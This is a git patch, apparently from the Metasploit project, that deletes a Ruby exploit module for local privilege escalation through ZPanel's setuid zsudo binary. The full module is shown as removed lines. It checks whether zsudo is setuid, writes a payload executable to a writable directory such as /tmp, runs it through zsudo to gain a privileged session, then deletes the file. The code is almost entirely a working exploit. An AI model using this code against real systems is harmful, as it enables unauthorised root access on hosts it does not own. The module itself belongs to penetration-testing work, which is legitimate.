From b49c4c4e9e1d9fbb72e7c3e023287e0598ecd143 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 22 Jun 2013 18:28:17 -0500 Subject: [PATCH] up to date --- modules/exploits/linux/local/zpanel_zsudo.rb | 84 -------------------- 1 file changed, 84 deletions(-) delete mode 100644 modules/exploits/linux/local/zpanel_zsudo.rb diff --git a/modules/exploits/linux/local/zpanel_zsudo.rb b/modules/exploits/linux/local/zpanel_zsudo.rb deleted file mode 100644 index 90cffdec60..0000000000 --- a/modules/exploits/linux/local/zpanel_zsudo.rb +++ /dev/null @@ -1,84 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'rex' -require 'msf/core/post/common' -require 'msf/core/post/file' -require 'msf/core/post/linux/priv' -require 'msf/core/exploit/exe' - - -class Metasploit4 < Msf::Exploit::Local - Rank = ExcellentRanking - - include Msf::Exploit::EXE - include Msf::Post::File - include Msf::Post::Common - - def initialize(info={}) - super( update_info( info, { - 'Name' => 'ZPanel zsudo Local Privilege Escalation Exploit', - 'Description' => %q{ - This module abuses the zsudo binary installed with zpanel to get a privileged - session if a session with privileges in the sudoers file to execute it is - granted. This module is useful for post exploitation of ZPanel vulnerabilities - where typically web server privileges are acquired, and this user is allowed to - execute zsudo on the sudoers file. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'sinn3r' ], - 'DisclosureDate' => 'Jun 07 2013', - 'Platform' => [ 'unix', 'linux'], - 'Arch' => [ ARCH_CMD, ARCH_X86 ], - 'SessionTypes' => [ 'shell', 'meterpreter' ], - 'Targets' => - [ - [ 'Command payload', { 'Arch' => ARCH_CMD } ], - [ 'Linux x86', { 'Arch' => ARCH_X86 } ] - ], - 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, - 'DefaultTarget' => 0, - } - )) - register_options([ - # These are not OptPath becuase it's a *remote* path - OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), - OptString.new("zsudo", [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ]), - ], self.class) - end - - def check - stat = session.fs.file.stat(datastore["zsudo"]) - if stat and stat.file? and stat.setuid? - print_good("#{stat.prettymode} #{datastore["zsudo"]}") - return CheckCode::Vulnerable - end - return CheckCode::Safe - end - - def exploit - exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.elf" - if (target.arch.include? ARCH_CMD) - write_file(exe_file, payload.encoded) - else - write_file(exe_file, generate_payload_exe) - end - - cmd_exec "chmod +x #{exe_file}" - - print_status("running") - - begin - cmd_exec "#{datastore["zsudo"]} #{exe_file}}" - ensure - cmd_exec "rm -f #{exe_file}" - end - - end -end -